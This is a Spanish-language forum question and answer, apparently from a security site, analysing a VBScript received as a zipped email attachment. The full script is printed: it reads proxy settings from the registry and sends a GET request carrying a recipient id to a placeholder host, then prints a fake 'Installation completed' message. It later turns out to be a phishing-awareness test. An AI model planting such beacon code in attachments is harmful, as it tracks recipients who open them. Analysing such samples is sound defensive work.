La secuencia de comandos vbs maliciosa solo abre una conexión GET HTTPS

1

Hoy recibimos un script vbs malicioso en nuestro buzón (el archivo adjunto era un zip que contenía el script).

Debajo puede encontrar la fuente (nota: el dominio cambió debido a que no quiere propagar malware, pero los parámetros siguen siendo los mismos).

Dim ProxyOn, ProxyServer, ProxyOverride
Dim h, hh, s, u

Set s = CreateObject("wscript.Shell")

u = "https://example.com/?rid%3DVGX0Ipd&pad%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
u = Replace(u, "%3D", "=")

On Error Resume Next

ProxyOn = s.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" & "ProxyEnable")
ProxyServer = s.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" & "ProxyServer")

Set h =  CreateObject("WinHttp.WinHttpRequest.5.1")
Set hh = CreateObject("WinHttp.WinHttpRequest.5.1")

If ProxyOn = 1 Then
    h.SetProxy 2, ProxyServer
End If

hh.SetProxy 1, ProxyServer

On Error Resume Next

h.Open "GET", u, False
h.SetTimeouts 10000, 10000, 10000, 10000
h.Send

If Err.Number <> 0 Then
  On Error Resume Next
  hh.Open "GET", u, False
  hh.SetTimeouts 10000, 10000, 10000, 10000
  hh.Send
End If

WScript.Sleep 2000
WScript.Echo "Installation completed."

Para mí, no parece hacer mucho, lee la configuración del proxy (¿para evitar el firewall?) y emite un comando GET a la URL (maliciosa), pero no hace nada con la respuesta.

Por supuesto que no intentamos correr.

¿Qué intenta hacer exactamente este código?

EDITAR: ¡Hoy recibimos la confirmación de que esto es parte de una campaña sobre seguridad cibernética en la empresa! El análisis en la respuesta es correcto.

Saludos cordiales!

    
pregunta Devenda 21.09.2017 - 13:59
fuente

1 respuesta

1

Por lo que puedo decir, su evaluación parece precisa. Veo 2 opciones posibles:

  1. Esta es una prueba de reconocimiento para ver si alguien abrirá los archivos adjuntos.
  2. Este ataque se ejecutó de manera deficiente y se le envió un script sin terminar.

Actualmente me estoy inclinando hacia la segunda explicación. No hay ninguna razón para repetir cualquier salida en un dropper, y mucho menos algo tan sospechoso como "Instalación completada".

    
respondido por el user52472 21.09.2017 - 18:10
fuente

Lea otras preguntas en las etiquetas